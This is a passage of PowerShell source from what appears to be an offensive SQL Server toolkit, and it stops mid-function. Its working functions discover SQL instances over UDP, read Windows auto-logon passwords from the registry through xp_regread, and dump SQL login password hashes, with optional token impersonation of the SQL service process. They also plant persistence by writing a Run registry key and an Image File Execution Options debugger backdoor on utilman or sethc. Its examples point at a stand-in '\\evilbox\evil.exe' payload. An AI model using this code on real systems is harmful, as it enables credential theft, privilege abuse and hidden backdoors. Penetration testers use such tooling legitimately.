$TableResults.columns.add('ComputerName') $null = $TableResults.columns.add('Instance') $null = $TableResults.columns.add('InstanceName') $null = $TableResults.columns.add('ServerIP') $null = $TableResults.columns.add('TCPPort') $null = $TableResults.columns.add('BaseVersion') $null = $TableResults.columns.add('IsClustered') $TableResults.Clear() # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # Ensure provide instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } $PipelineItems = $PipelineItems + $ProvideInstance } } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $ComputerName = $_.ComputerName if(-not $SuppressVerbose) { Write-Verbose -Message " - $ComputerName - UDP Scan Start." } # Verify server name isn't empty if ($ComputerName -ne '') { # Try to enumerate SQL Server instances from remote system try { # Resolve IP $IPAddress = [System.Net.Dns]::GetHostAddresses($ComputerName) # Create UDP client object $UDPClient = New-Object -TypeName System.Net.Sockets.Udpclient # Attempt to connect to system $UDPTimeOutMilsec = $UDPTimeOut * 1000 $UDPClient.client.ReceiveTimeout = $UDPTimeOutMilsec $UDPClient.Connect($ComputerName,0x59a) $UDPPacket = 0x03 # Send request to system $UDPEndpoint = New-Object -TypeName System.Net.Ipendpoint -ArgumentList ([System.Net.Ipaddress]::Any, 0) $UDPClient.Client.Blocking = $true [void]$UDPClient.Send($UDPPacket,$UDPPacket.Length) # Process response from system $BytesRecived = $UDPClient.Receive([ref]$UDPEndpoint) $Response = [System.Text.Encoding]::ASCII.GetString($BytesRecived).split(';') $values = @{} for($i = 0; $i -le $Response.length; $i++) { if(![string]::IsNullOrEmpty($Response[$i])) { $values.Add(($Response[$i].ToLower() -replace '[\W]', ''),$Response[$i+1]) } else { if(![string]::IsNullOrEmpty($values.'tcp')) { if(-not $SuppressVerbose) { $DiscoveredInstance = "$ComputerName\"+$values.'instancename' Write-Verbose -Message " - $ComputerName - Found: $DiscoveredInstance" } # Add SQL Server instance info to results table $null = $TableResults.rows.Add( [string]$ComputerName, [string]"$ComputerName\"+$values.'instancename', [string]$values.'instancename', [string]$IPAddress, [string]$values.'tcp', [string]$values.'version', [string]$values.'isclustered') $values = @{} } } } # Close connection $UDPClient.Close() } catch { #"Error was $_" #$line = $_.InvocationInfo.ScriptLineNumber #"Error was in Line $line" # Close connection # $UDPClient.Close() } } if(-not $SuppressVerbose) { Write-Verbose -Message " - $ComputerName - UDP Scan End." } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TableResults } } # ---------------------------------- # Get-SQLInstanceFile # ---------------------------------- # Author: Scott Sutherland Function Get-SQLInstanceFile { <# .SYNOPSIS Returns a list of SQL Server instances from a file. One per line. Three instance formats supported: 1 - computername 2 - computername\instance 3 - computername,1433 .PARAMETER FilePath Path to file containing instances. One per line. .EXAMPLE PS C:\> Get-SQLInstanceFile -Verbose -FilePath c:\temp\servers.txt VERBOSE: Importing instances from file path. VERBOSE: 3 instances where found in c:\temp\servers.txt. ComputerName Instance ------------ -------- Computer1 Computer1\SQLEXPRESS Computer1 Computer1\STANDARDDEV2014 Computer1 Computer1 #> [CmdletBinding()] Param( [Parameter(Mandatory = $true, HelpMessage = 'The file path.')] [string]$FilePath ) Begin { # Table for output $TblFileInstances = New-Object -TypeName System.Data.DataTable $null = $TblFileInstances.Columns.Add('ComputerName') $null = $TblFileInstances.Columns.Add('Instance') } Process { # Test file path if(Test-Path $FilePath) { Write-Verbose -Message 'Importing instances from file path.' } else { Write-Output -InputObject 'File path does not appear to be valid.' break } # Grab lines from file Get-Content -Path $FilePath | ForEach-Object -Process { $Instance = $_ if($Instance.Split(',')[1]) { $ComputerName = $Instance.Split(',')[0] } else { $ComputerName = $Instance.Split('\')[0] } # Add record if($_ -ne '') { $null = $TblFileInstances.Rows.Add($ComputerName,$Instance) } } } End { # Status User $FileInstanceCount = $TblFileInstances.rows.count Write-Verbose -Message "$FileInstanceCount instances where found in $FilePath." # Return data $TblFileInstances } } #endregion ######################################################################### # #region PASSWORD RECOVERY FUNCTIONS # ######################################################################### # ---------------------------------- # Get-SQLRecoverPwAutoLogon # ---------------------------------- # Author: Scott Sutherland Function Get-SQLRecoverPwAutoLogon { <# .SYNOPSIS Returns the Windows auto login credentials through SQL Server using xp_regread. This requires sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .Example PS C:\> Get-SQLInstanceLocal | Get-SQLRecoverPwAutoLogon -Verbose VERBOSE: SQLServer1\SQLEXPRESS : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1 : Connection Success. ComputerName : SQLServer1 Instance : SQLServer1\SQLEXPRESS Domain : Demo UserName : KioskAdmin Password : KioskPassword! ComputerName : SQLServer1 Instance : SQLServer1\SQLEXPRESS Domain : Demo UserName : kioskuser Password : KioskUserPassword! .Example PS C:\> Get-SQLRecoverPwAutoLogon -Verbose -instance SQLServer1\STANDARDDEV2014 VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Domain : localhost UserName : KioskAdmin Password : KioskPassword! ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Domain : localhost2 UserName : kioskuser Password : KioskUserPassword! .Notes https://support.microsoft.com/en-us/kb/321185 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblWinAutoCreds = New-Object -TypeName System.Data.DataTable $TblWinAutoCreds.Columns.Add("ComputerName") | Out-Null $TblWinAutoCreds.Columns.Add("Instance") | Out-Null $TblWinAutoCreds.Columns.Add("Domain") | Out-Null $TblWinAutoCreds.Columns.Add("UserName") | Out-Null $TblWinAutoCreds.Columns.Add("Password") | Out-Null } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Get SQL Server version number $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Check if this can actually run with the current login if($IsSysadmin -ne "Yes") { Write-Verbose "$Instance : This function requires sysadmin privileges. Done." Return } # Get default auto login Query $DefaultQuery = " ------------------------------------------------------------------------- -- Get Windows Auto Login Credentials from the Registry ------------------------------------------------------------------------- -- Get AutoLogin Default Domain DECLARE @AutoLoginDomain SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'DefaultDomainName', @value = @AutoLoginDomain output -- Get AutoLogin DefaultUsername DECLARE @AutoLoginUser SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'DefaultUserName', @value = @AutoLoginUser output -- Get AutoLogin DefaultUsername DECLARE @AutoLoginPassword SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'DefaultPassword', @value = @AutoLoginPassword output -- Display Results SELECT Domain = @AutoLoginDomain, Username = @AutoLoginUser, Password = @AutoLoginPassword" # Execute Default Query $DefaultResults = Get-SQLQuery -Instance $Instance -Query $DefaultQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $DefaultUsername = $DefaultResults.Username if($DefaultUsername.length -ge 2){ # Add record to data table $DefaultResults | ForEach-Object{ $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null } }else{ Write-Verbose "$Instance : No default auto login credentials found." } # Get default alt auto login Query $AltQuery = " ------------------------------------------------------------------------- -- Get Alternative Windows Auto Login Credentials from the Registry ------------------------------------------------------------------------- -- Get Alt AutoLogin Default Domain DECLARE @AltAutoLoginDomain SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'AltDefaultDomainName', @value = @AltAutoLoginDomain output -- Get Alt AutoLogin DefaultUsername DECLARE @AltAutoLoginUser SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'AltDefaultUserName', @value = @AltAutoLoginUser output -- Get Alt AutoLogin DefaultUsername DECLARE @AltAutoLoginPassword SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon', @value_name = N'AltDefaultPassword', @value = @AltAutoLoginPassword output -- Display Results SELECT Domain = @AltAutoLoginDomain, Username = @AltAutoLoginUser, Password = @AltAutoLoginPassword" # Execute Default Query $AltResults = Get-SQLQuery -Instance $Instance -Query $AltQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $AltUsername = $AltResults.Username if($AltUsername.length -ge 2){ # Add record to data table $AltResults | ForEach-Object{ $TblWinAutoCreds.Rows.Add($ComputerName, $Instance,$_.Domain,$_.Username,$_.Password) | Out-Null } }else{ Write-Verbose "$Instance : No alternative auto login credentials found." } } End { # Return data $TblWinAutoCreds } } # ---------------------------------- # Get-SQLServerPolicy # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerPolicy { <# .SYNOPSIS Returns policy information related to policy based management. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\>Get-SQLServerPolicy -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 policy_id : 17 PolicyName : WatchAllTheThings condition_id : 18 ConditionName : DatCheck facet : Login ConditionExpression : Bool EQ 2 DateTime DateLastModified DateTime DateTime DateTime 1 String System.String 2017-09-14T00:00:00.0000000 root_condition_id : is_enabled : False date_created : 9/14/2017 9:01:11 PM date_modified : description : Watch all the things. created_by : sa is_system : False target_set_id : 17 TYPE : LOGIN type_skeleton : Server/Login .EXAMPLE PS C:\> Get-SQLInstanceLocal |Get-SQLServerPolicy -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblPolicyInfo = New-Object -TypeName System.Data.DataTable } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Define Query $Query = " -- Get-SQLServerPolicy.sql SELECT '$ComputerName' as [ComputerName], '$Instance' as [Instance], p.policy_id, p.name as [PolicyName], p.condition_id, c.name as [ConditionName], c.facet, c.expression as [ConditionExpression], p.root_condition_id, p.is_enabled, p.date_created, p.date_modified, p.description, p.created_by, p.is_system, t.target_set_id, t.TYPE, t.type_skeleton FROM msdb.dbo.syspolicy_policies p INNER JOIN msdb.dbo.syspolicy_conditions c ON p.condition_id = c.condition_id INNER JOIN msdb.dbo.syspolicy_target_sets t ON t.object_set_id = p.object_set_id" # Execute Query $TblPolicyInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append as needed $TblPolicyInfo = $TblPolicyInfo + $TblPolicyInfoTemp } End { # Count $PolNum = $TblPolicyInfo.Count if($PolNum -eq 0){ if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : No policies found." } } # Return data $TblPolicyInfo } } # ---------------------------------- # Get-SQLServerPasswordHash # ---------------------------------- # Author: Mike Manzotti (@mmanzo_) Function Get-SQLServerPasswordHash { <# .SYNOPSIS Returns logins from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER PrincipalName Pincipal name to filter for. .PARAMETER Migrate to SQL Server process. .EXAMPLE PS C:\> Get-SQLServerPasswordHash -Instance SQLServer1\STANDARDDEV2014 | Select-Object -First 1 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 PrincipalId : 1 PrincipalName : sa PrincipalSid : 7F883D1B... PrincipalType : SQL_LOGIN CreateDate : 19/03/2017 08:16:57 DefaultDatabaseName : master PasswordHash : 0x0200c8... .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerPasswordHash -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Principal name to filter for.')] [string]$PrincipalName, [Parameter(Mandatory = $false, HelpMessage = 'Migrate to SQL Server process.')] [switch]$Migrate, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblPasswordHashes = New-Object -TypeName System.Data.DataTable $null = $TblPasswordHashes.Columns.Add('ComputerName') $null = $TblPasswordHashes.Columns.Add('Instance') $null = $TblPasswordHashes.Columns.Add('PrincipalId') $null = $TblPasswordHashes.Columns.Add('PrincipalName') $null = $TblPasswordHashes.Columns.Add('PrincipalSid') $null = $TblPasswordHashes.Columns.Add('PrincipalType') $null = $TblPasswordHashes.Columns.Add('CreateDate') $null = $TblPasswordHashes.Columns.Add('DefaultDatabaseName') $null = $TblPasswordHashes.Columns.Add('PasswordHash') # Setup CredentialName filter if($PrincipalName) { $PrincipalNameFilter = " and name like '$PrincipalName'" } else { $PrincipalNameFilter = '' } } Process { # Note: Tables queried by this function typically require sysadmin privileges. # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } }else{ if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } # If the migrate flag is set dont't return and attempt to migrate if($Migrate) { # Get current user name $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name # Verify local administrator privileges $IsAdmin = Get-SQLLocalAdminCheck # Return if the current user does not have local admin privs if($IsAdmin -ne $true){ write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." return }else{ write-verbose "$Instance : $WinCurrentUserName has local admin privileges." } # Check for running sql service processes that match the instance Write-Verbose -Message "$Instance : Impersonating SQL Server process:" [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount # Return if no matches exist if ($TargetPid -eq 0){ Write-Verbose -Message "$Instance : No process running for provided instance..." return } # Status user if a match is found Write-Verbose -Message "$Instance : - Process ID: $TargetPid" Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" # Attempt impersonation try{ Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null }catch{ $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Impersonation failed." Write-Verbose -Message " $Instance : $ErrorMessage" return } }else{ return } } # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are a sysadmin." } else { Write-Verbose -Message "$Instance : You are not a sysadmin." if($Migrate) { # Get current user name $WinCurrentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().name # Verify local administrator privileges $IsAdmin = Get-SQLLocalAdminCheck # Return if the current user does not have local admin privs if($IsAdmin -ne $true){ write-verbose "$Instance : $WinCurrentUserName DOES NOT have local admin privileges." return }else{ write-verbose "$Instance : $WinCurrentUserName has local admin privileges." } # Check for running sql service processes that match the instance Write-Verbose -Message "$Instance : Impersonating SQL Server process:" [int]$TargetPid = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceProcessId -ExpandProperty ServiceProcessId [string]$TargetServiceAccount = Get-SQLServiceLocal -SuppressVerbose -instance $Instance -RunOnly | Where-Object {$_.ServicePath -like "*sqlservr.exe*"} | Select-Object ServiceAccount -ExpandProperty ServiceAccount # Return if no matches exist if ($TargetPid -eq 0){ Write-Verbose -Message "$Instance : No process running for provided instance..." return } # Status user if a match is found Write-Verbose -Message "$Instance : - Process ID: $TargetPid" Write-Verbose -Message "$Instance : - ServiceAccount: $TargetServiceAccount" # Attempt impersonation try{ Get-Process | Where-Object {$_.id -like $TargetPid} | Invoke-TokenManipulation -Instance $Instance -ImpersonateUser -ErrorAction Continue | Out-Null }catch{ $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Impersonation failed." Write-Verbose -Message " $Instance : $ErrorMessage" return } }else{ return } } # Status user Write-Verbose -Message "$Instance : Attempting to dump password hashes." # Check version $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } if([int]$SQLVersionShort -le 8) { # Define Query $Query = "USE master; SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance], name as [PrincipalName], createdate as [CreateDate], dbname as [DefaultDatabaseName], password as [PasswordHash] FROM [sysxlogins]" } else { # Define Query $Query = "USE master; SELECT '$ComputerName' as [ComputerName],'$Instance' as [Instance], name as [PrincipalName], principal_id as [PrincipalId], type_desc as [PrincipalType], sid as [PrincipalSid], create_date as [CreateDate], default_database_name as [DefaultDatabaseName], [sys].fn_varbintohexstr(password_hash) as [PasswordHash] FROM [sys].[sql_logins]" } # Execute Query $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Update sid formatting for each record $TblResults | ForEach-Object -Process { # Format principal sid $NewSid = [System.BitConverter]::ToString($_.PrincipalSid).Replace('-','') if ($NewSid.length -le 10) { $Sid = [Convert]::ToInt32($NewSid,16) } else { $Sid = $NewSid } # Add results to table $null = $TblPasswordHashes.Rows.Add( [string]$_.ComputerName, [string]$_.Instance, [string]$_.PrincipalId, [string]$_.PrincipalName, $Sid, [string]$_.PrincipalType, $_.CreateDate, [string]$_.DefaultDatabaseName, [string]$_.PasswordHash) } # Status user Write-Verbose -Message "$Instance : Attempt complete." # Revert to original user context if($Migrate){ Invoke-TokenManipulation -RevToSelf | Out-Null } } End { # Get hash count $PasswordHashCount = $TblPasswordHashes.Rows.Count write-verbose "$PasswordHashCount password hashes recovered." # Return table if hashes exist if($PasswordHashCount -gt 0){ # Return data $TblPasswordHashes } } } #endregion ######################################################################### # #region DATA EXFILTRATION FUNCTIONS # ######################################################################### # #endregion ######################################################################### # #region PERSISTENCE FUNCTIONS # ######################################################################### # ---------------------------------- # Get-SQLPersistRegRun # ---------------------------------- # Author: Scott Sutherland Function Get-SQLPersistRegRun { <# .SYNOPSIS This function will use the xp_regwrite procedure to setup an executable to automatically run when users log in. The specific registry key is. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run Sysadmin privileges are required. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Name Registry value name. .PARAMETER Command Command to run. .Example PS C:\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command 'PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt"' -Instance "SQLServer1\STANDARDDEV2014" VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: PureEvil VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt" VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. VERBOSE: SQLServer1\STANDARDDEV2014 : Done. .Example PS C:\> Get-SQLPersistRegRun -Verbose -Name PureEvil -Command "\\evilbox\evil.exe" -Instance "SQLServer1\STANDARDDEV2014" VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write value: PureEvil VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: \\evilbox\evil.exe VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. VERBOSE: SQLServer1\STANDARDDEV2014 : Done. .Notes https://support.microsoft.com/en-us/kb/887165 https://msdn.microsoft.com/en-us/library/aa940179(v=winembedded.5).aspx http://sqlmag.com/t-sql/using-t-sql-manipulate-registry #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Name of the registry value.')] [string]$Name = "Hacker", [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'The command to run.')] [string]$Command = 'PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt"', [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin # Get SQL Server version number $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber if($SQLVersionFull) { $SQLVersionShort = $SQLVersionFull.Split('.')[0] } # Check if this can actually run with the current login if($IsSysadmin -ne "Yes") { Write-Verbose "$Instance : This function requires sysadmin privileges. Done." Return }else{ Write-Verbose "$Instance : Attempting to write value: $name" Write-Verbose "$Instance : Attempting to write command: $command" } # Setup query for registry update $Query = " --------------------------------------------- -- Use xp_regwrite to configure -- a file to execute sa command when users l -- log into the system ---------------------------------------------- EXEC master..xp_regwrite @rootkey = 'HKEY_LOCAL_MACHINE', @key = 'Software\Microsoft\Windows\CurrentVersion\Run', @value_name = '$Name', @type = 'REG_SZ', @value = '$Command'" # Execute query $Results = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Setup query to verify the write is successful $CheckQuery = " ------------------------------------------------------------------------- -- Get Windows Auto Login Credentials from the Registry ------------------------------------------------------------------------- -- Get AutoLogin Default Domain DECLARE @CheckValue SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'Software\Microsoft\Windows\CurrentVersion\Run', @value_name = N'$Name', @value = @CheckValue output -- Display Results SELECT CheckValue = @CheckValue" # Execute query $CheckResults = Get-SQLQuery -Instance $Instance -Query $CheckQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CheckCommand = $CheckResults.CheckValue if($CheckCommand.length -ge 2){ Write-Verbose "$Instance : Registry entry written." }else{ Write-Verbose "$Instance : Fail to write to registry due to insufficient privileges." } } End { # Return message Write-Verbose "$Instance : Done." } } # ---------------------------------- # Get-SQLPersistRegDebugger # ---------------------------------- # Author: Scott Sutherland Function Get-SQLPersistRegDebugger { <# .SYNOPSIS This function uses xp_regwrite to configure a debugger for a provided executable (utilman.exe by default), which will run another provided executable (cmd.exe by default) when it's called. It is commonly used to create RDP backdoors. The specific registry key is HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options[EXE]. Sysadmin privileges are required. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER FileName File to replace execution on. .PARAMETER Command Command to run. .Example PS C:\> Get-SQLPersistRegDebugger-Verbose -FileName utilman.exe -Command 'c:\windows\system32\cmd.exe' -Instance "SQLServer1\STANDARDDEV2014" VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write debugger for: utilman.exe VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: c:\windows\system32\cmd.exe VERBOSE: SQLServer1\STANDARDDEV2014 : Registry entry written. VERBOSE: SQLServer1\STANDARDDEV2014 : Done. .Example PS C:\> Get-SQLPersistRegDebugger-Verbose -Name sethc.exe -Command "PowerShell.exe -C "Write-Output hacker | Out-File C:\temp\iamahacker.txt"" -Instance "SQLServer1\STANDARDDEV2014" VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write debugger for: sethc.exe VERBOSE: SQLServer1\STANDARDDEV2014 : Attempting to write command: 